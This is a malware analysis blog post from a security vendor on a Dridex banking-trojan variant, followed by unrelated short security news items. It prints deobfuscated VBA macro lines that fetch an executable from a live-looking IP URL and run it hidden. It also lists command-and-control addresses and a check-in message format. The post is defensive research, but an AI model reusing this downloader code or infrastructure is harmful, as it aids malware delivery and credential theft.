Credit: Christopher D. Del Fierro, Lead Malware Research Engineer, ThreatTrack Security

We have seen Dridex since 2014 and it is still active in the wild today. This research will be focusing on analyzing Dridex and on how it is able to remain undetected by most antivirus engines. For those not familiar with Dridex, it is a malspam (malware from a spam email) that targets Windows-operated systems with the intent to steal credentials and obtain money from a victim’s bank account.

Malware authors, not surprisingly, always try to come up with something new to avoid detection and make the researcher’s life more difficult. In a quick overview, there is nothing new in the infection sequence of Dridex. But authors of Dridex have made some upgrades and workarounds to avoid detection that we’ll discuss in detail below.

INFECTION CHAIN SUMMARY

 InfectionChain

 

IN-DEPTH ANALYSIS

As most of Dridex samples come through spam, this particular new variant is no different. We recently caught a sample of its email attachment named “Payment Confirmation 98FD41.doc.” Although the attachment is named with a .doc extension, it is not a DOC file format but actually a malformed MHT. MHTs are archived format for web pages that are usually opened with Internet Explorer by default.

HiewMalFormedMHT

The malware author purposely crafted bytes before the string “MIME-version” to signify the start of an actual MHT file. This was done in an attempt to bypass some antivirus scanner engines and wrongfully classify this type of malware as a txt file or any other file format but not MHT.

This MHT file contains an embedded DOC file inside. The DOC file is the one that contains VBA (Visual Basic for Applications) macro codes responsible for downloading and executing Dridex unbeknownst to the user.

In most scenarios where computer systems are running Microsoft Windows, MHT files are loaded through Internet Explorer while DOC files are loaded by Microsoft Word, unless an advanced user changes its default application launcher settings. Because of those default settings, the malware author deliberately altered the extension of its malformed MHT file and changed it into .doc, fooling the system into loading it via Microsoft Word. And if macros are enabled in Microsoft Word, it will continue its infection routine and download and execute Dridex in the background.

As of this blog, executing the “Payment Confirmation 98FD41.doc” in a sandbox environment with macros enabled produces an error in VBA. This is because the site that it supposedly attempts to connect to is now down.

WinWordShot

Pressing Alt+F8 in Microsoft Word takes us to the Macros screen. As you can see, it has two macro functions, AutoOpen and FYFChvhfygDGHds.

Macros

Attempting to click “Edit” will promt a request for a password, which, of course, could be anything.

PasswordMacros

This makes things a bit more challenging, but we can extract the information using a more unconventional method.

Since “Payment Confirmation 98FD41.doc” is actually an MHT file that contains an embedded doc file, the first step is to rename it to an .eml extension “Payment Confirmation 98FD41.eml.” From there, we opened it using Microsoft Outlook (though whatever email client is currently being used will suffice). The embedded objects in “Payment Confirmation 98FD41.doc” have become attachments when renamed to .eml. Then we browsed the attachments and looked for a file that starts with the string “ActiveMime” when viewed in a hex editor.

ConvertedToOutlookEML

This type is of file format is an MSO and could not be read normally by the naked eye. Since this is an old-school malware, we were lucky to have kept an old-school tool called UNMSO.EXE, which, as the name implies, unpacks the MSO. The output of this tool produces a “true” DOC file format. And yes, it holds our malicious VBA macro codes inside.

ActiveMimeToDOCF

Quickly examining the DOC file output, we can see naked strings “http://31.131.24.203/indiana/jones.php” and ”\yFUYIdsf.exe” in the body.

olevbaOutput

We then used a tool called olevba.py (http://www.decalage.info/python/olevba) to extract VBA macro source codes and output its result into a text file.

Typical to any VBA macro malwares, it is obfuscated and contains a bunch of useless codes in an attempt to confuse the researcher analyzing it. The list is pretty lengthly, so only the important ones are listed here.

pjIOHdsfc = UserForm1.TextBox1 (which points to the string http://31.131.24.203/indiana/jones.php)

dTYFidsff = Environ(StrReverse(“PMET”)) & UserForm1.TextBox2 (which points to the string \yFUYIdsf.exe)

Dim erDTFGHJkds As Object

Set erDTFGHJkds = CreateObject(StrReverse(“1.5.tseuqerPTTHniW.PTTHniW”))

erDTFGHJkds.Open StrReverse(“TEG”), pjIOHdsfc, False

erDTFGHJkds.Send

Open dTYFidsff For Binary Access Write As #yFVHJBkdsf

sjdhfbk = Shell(dTYFidsff, vbHide)

VBA Open command is responsible for connecting and downloading Dridex while VBA Shell command is responsible for executing it. In this example, it connects and downloads Dridex in http://31.131.24.203/indiana/jones.php, which is later renamed and executed in %TEMP%\ yFUYIdsf.exe.

DOWNLOADED DRIDEX EXECUTABLE

The downloaded Dridex executable has an MD5 of EBB1562E4B0ED5DB8A646710F3CD2EB8. Analyzing this executable is like an orange, we have to peel-off the outer layer first to get to the good stuff. We can break the Dridex executable further into two parts: The Decoder and the Naked Dridex.

THE DECODER

A quick glance at its entry-point, it looks like a Microsoft Visual C++ 6.0 compiled program. In fact, it is really a Microsoft Visual C++ 6.0 except that the usual code-execution is not followed. That means Dridex codes are inserted right before WINMAIN is called (WINMAIN is the usual go-to entry-point of a C++ 6 compiled executable). This was intended by the malware author in an attempt to hide its code from the researcher. There are also a bunch of useless codes, strings, loops and windows APIs to throw off researchers when debugging.

The code will look for kernel32.VirtualAlloc API by traversing kernel32.dll’s import table and comparing it to the hash of “3A8E4D14h” using its own hashing algorithm.

Decoder-VirtualAllocCalled

It uses the unconventional PUSH DWORD OFFSET – RETN combination instead of a direct CALL DWORD approach to hide its procedures.

PUSH-RETN

Once kernel32.VirtualAlloc has been successfully saved, it will then use the said API to allocate a size of 5A44h bytes in memory in order to decrypt codes and write it to the allocated memory space before transferring execution.

It will then again traverse kernel32.dll in order to get the base image address and populate its API table, which is needed for further unpacking. Using GetProcAddress, it will get the address of the following APIs:

CloseHandle

CreateThread

CreateToolhelp32Snapshot

EnterCriticalSection

EnumServicesStatusExA

FreeConsole

GetCurrentProcessId

GetCurrentThreadId

GlobalAlloc

GlobalFree

InitializeCriticalSection

IsBadReadPtr

LeaveCriticalSection

LeaveCriticalSection

LoadLibraryA

OpenSCManagerA

RegCloseKey

RegOpenKeyExA

RtlDecompressBuffer

RtlZeroMemory

Thread32First

Thread32Next

VirtualAlloc

VirtualFree

VirtualProtect

ZwCreateFile

ZwCreateThread

ZwCreateThreadEx

ZwCreateUserProcess

ZwOpenFile

ZwOpenProcess

ZwProtectVirtualMemory

ZwQueueApcThread

ZwSetContextThread

ZwSetValueKey

ZwSuspendThread

ZwTerminateProcess

ZwWriteVirtualMemory

After a series of debugging obfuscated codes and decrypting, it will finally land on using RTLDecompressBuffer in which an MZ-PE file will be decompressed in memory, after which execution is then transferred using CreateThread. This decompressed executable (we call it Naked Dridex) is detected as Trojan.Win32.Dridex.aa (v) by VIPRE long before. Based on this observation, this variant of the Dridex executable was already caught in the past, hence the reason it is detected by a heuristic pattern by ThreatTrack’s VIPRE Antivirus. The only difference now is that it is wrapped around by a “new” protective layer as a means of bypassing most antivirus engines.

We also made another interesting discovering when debugging: The malware attempts to hide its tracks by using Windows API FreeConsole. Taken from MSDN, FreeConsole detaches the calling process from its console.

PEID

Since this executable is of a Win32 console-type subsystem, you should see a console application popping up and then closing abruptly if you run it in a Windows environment (i.e. double-click “execute”). It only means that it detached itself from the console application but continually runs itself in the background. One way to test this theory is to execute the malware in CMD.EXE and you should see that no inputs will be accepted subsequently. This is because FreeConsole detached the malware from CMD.EXE. Even pushing “CTRL-C,” “CTRL-BREAK” or even closing CMD.EXE altogether will not stop it from progressing.

THE NAKED DRIDEX 

This is where it all gets interesting. Although we have peeled off most of its outer layer, this malware still has plenty of obfuscated codes within it. Note that its Import Address Table is 0, meaning that at some point it will have to populate its IAT.

ZEROIAT

These are the following Windows APIs that will be used:

AllocateAndInitializeSid

CharLowerA

CloseHandle

CommandLineToArgvW

CompareStringA

CreateFileW

CryptAcquireContextW

CryptCreateHash

CryptDestroyHash

CryptGenRandom

CryptGetHashParam

CryptHashData

CryptReleaseContext

DeleteFileW

EqualSid

ExitProcess

ExpandEnvironmentStringsW

FindClose

FindFirstFileW

FindNextFileW

FreeSid

GetCurrentProcess

GetFileAttributesW

GetLastError

GetTokenInformation

GetVersionExW

HeapAlloc

HeapCreate

HeapFree

HeapSize

HeapValidate

HttpOpenRequestW

HttpQueryInfoW

HttpSendRequestW

InternetCloseHandle

InternetConnectW

InternetOpenA

InternetQueryOptionW

InternetReadFile

InternetSetOptionW

IsWow64Process

LoadLibraryW

MultiByteToWideChar

OpenProcessToken

RegCloseKey

RegEnumKeyA

RegOpenKeyExA

RegQueryValueExA

RemoveDirectoryW

RtlComputeCrc32

RtlFillMemory

RtlGetLastWin32Error

RtlMoveMemory

SetFileAttributesW

SetFilePointer

Sleep

WideCharToMultiByte

WTSEnumarateSessionsW

WTSFreeMemory

WTSQueryUserToken

wvnsprintfW

Previous versions of Dridex have CnC configuration that are usually found and is easily decrypted with linear XOR or even seen as plain text format like this in its body:

<config botnet=”xxx”>

   <server_list>

37.139.47.105:80

66.110.179.66:8080

5.39.99.18:80

136.243.237.218:80

   </server_list>

</config>­

However, with this version, settings are located in .data section in hex format just to make it harder for the researcher to distinguish them.

CnCSettingsHiew

Converting them to their ASCII counterpart will have the following settings as:

Bot version: 0x78 = 120

CnC Servers:

0xB9.0x18.0x5C.0xE5:0x1287 = 185.24.92.229:4743

0x67.0xE0.0x53.0x82:0x102F = 103.224.83.130:4143

0x2E.0x65.0x9B.0x35:0x0477 = 46.101.155.53:1143

0x01.0xB3.0xAA.0x07:0x118D = 1.179.170.7:4493

Dridex will collect information to fingerprint the infected system. Data like the Windows version “Service Pack,” computer name, username, install date and installed softwares will be gathered and sent to a CnC server.

A unique module name by the infected system will be generated by computing for the MD5 of combined data of the following registry entries:

Key: HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/ComputerName/ComputerName

Name: ComputerName

Key: HKEY_LOCAL_MACHINE/Volatile Environment

Name: USERNAME

Key: HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion

Name: InstallDate

The MD5 result will be appended to the ComputerName joined with the character “_” (e.g. “WINXP_2449c0c0c6a9ffb4e33613709f4db358”).

It will also gather a list of installed software by enumerating the subkeys of HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall and acquiring their “DisplayName” and “DisplayVersion.” It will construct a string using the format “DisplayName (DisplayVersion) separated by “;” for every subkey enumerated.

It will then attempt to delete versions of AVG antivirus in an infected system by searching for its settings in the registry “HKLM/SYSTEM/CurrentControlSet/services/Avg/SystemValues” and traversing the %LocalAppData% folder for its files. It even supported deleting future versions of AVG, from AVG2010 upto AVG2020.

We have noticed, though, that there seems to be an irregularity on the coding part of the malware author because it decrements the value of AVG20(%d) by one where %d starts from 20 (e.g AVG2020, AVG2019, AVG2018, etc.) So when it reaches AVG2010, instead of decrementing to AVG2009, it becomes AVG209, AVG208, AVG207 upto AVG206.

This is the message format that is to be sent to a CnC.

<loader><get_module unique=”%s” botnet=”%d” system=”%d” name=”%s” bit=”%d”/>

Sample message to send:

<loader><get_module unique=”WINXP_2449c0c0c6a9ffb4e33613709f4db358″ botnet=”120″ system=”23120″ name=”list” bit=”32″/><soft><![CDATA[4NT Unicode 6.0 (6.0);AOL Instant Messenger;CodeStuff Starter (5.6.2.0);Compuware DriverStudio 3.2 (3.2);HijackThis 1.99.1 (1.99.1);IDA Pro Advanced v5.0;InstallRite 2.5;mIRC (6.21);PE Explorer 1.96 (1.96);Viewpoint Media Player;VideoLAN VLC media player 0.8.6c(0.8.6c);Windows XP Service Pack 2 (20040803.231319);WinHex;WinPcap 4.0.1 (4.0.0.901);WinRAR archiver;Wireshark 0.99.6a (0.99.6a);Yahoo! Messenger;ActivePerl5.8.3 Build 809 (5.8.809);Debugging Tools for Windows (x86) (6.9.3.113);Microsoft Visual C++ 2008 Redistributable – x86 9.0.30729.4148 (9.0.30729.4148);Python 2.5.1 (2.5.1150);WebFldrs XP (9.50.5318);UltraEdit-32 (10.20c);Java 2 RuntimeEnvironment, SE v1.4.2_15 (1.4.2_15);Microsoft Office Professional Edition 2003 (11.0.5614.0);MSN Messenger 7.0 (7.0.0777);Adobe Reader 6.0 (6.0);VMware Tools (9.6.1.1378637);Compuware DriverStudio (3.2);Starting path: 5]]></soft></loader>

The malware then attempts to connect to its CnC servers using SSL requests by using wininet functions such as InternetConnectW and HttpOpenRequestW. It then sends the data gathered earlier using HttpSendRequestW.

WiresharkCnC

The server will even reply a malicious SSL certificate upon a successful connection. SQUERT identified the Malicious SSL certificate as Dridex.

SQUERTSSL

HiewSSL

The CnC server is supposed to issue a malicious DLL file at this point with an export function of “NotifierInit” and attach it to a running process of EXPLORER.EXE; however, the CnCs in its list are now taken down as of this writing.

WHAT TO DO?

To keep Dridex at bay, we recommended you block it early from the root of its infection chain. Here are some tips:

  • Always keep your operating system and security products up to date.
  • Take precaution when opening attachments, especially when sent by an unknown sender.
  • Never enable VBA macros by default for any Microsoft Office application. Some macro malwares even tell you how to enable macros or may mislead you in doing so.
  • Leverage advanced threat defense tools like ThreatSecure Email to protect against spear-phishing and targeted malware attacks that bypass traditional defenses. Cybercriminals have developed increasingly sophisticated attacks to bypass anti-spam and email filtering technologies and infiltrate your network. ThreatSecure Email identifies suspicious emails, detects malicious attachments or links, and stops them before they can reach their target, without relying on signatures.

HASHES

A6844F8480E641ED8FB0933061947587 – malicious MHT attachment (LooksLike.MHT.Malware.a (v))

EBB1562E4B0ED5DB8A646710F3CD2EB8 – Dridex executable (Trojan.Win32.Generic!BT)

 

The post What’s New with Dridex appeared first on ThreatTrack Security Labs Blog.

768-bit RSA cracked

Researchers have decomposed a 768-bit number with 232 decimal places into its two prime factors and published a paper with their results. The number is the string released as "RSA-768" under the now defunct RSA Challenge. As a result, RSA encryptions with 768-bit keys must, from now on, be considered cracked.

Seven Habits of Highly Malicious Hackers

You can't defend against the cyber enemy if you don't know his movements or how he thinks.

Sanjay Bavisi, president of security certification, training, and education organization EC-Council, at Interop Las Vegas next week will demonstrate step-by-step how a typical black-hat hacker executes an attack from reconnaissance to covering his tracks in the "Seven Habits of Highly Malicious Hackers" presentation on Thursday.

Profit-Minded Trojans

MAY 11, 2007 | The first Trojan horse was designed to win the war and get the girl. But according to new research from PandaLabs, Trojan software makers now have gone commercial.

Sixty-six percent of the new Trojans that emerged in the first quarter of 2007 were designed for financial gain, according to the security company's quarterly research report, which was published Wednesday.

Senate OKs Controversial Internet Treaty

The U.S. Senate Friday ratified an international treaty designed to ease investigation of cybercrime, but U.S. civil liberties groups say that signing the pact is a big mistake. The Council of Europe's Convention on Cybercrime, which began circulating in 2001, has been adopted by 41 other countries, including most of Europe as well as Canada and Japan. It is designed to harmonize laws on computer crime, which differ from country to country. Countries that sign the treaty agree to establish some common laws against criminal behavior online, such as attacks on computer networks, terrorist tactics, and exploitation of children. The language of the treaty is very broad and doesn't require the U.S. to write any new cybercrime laws.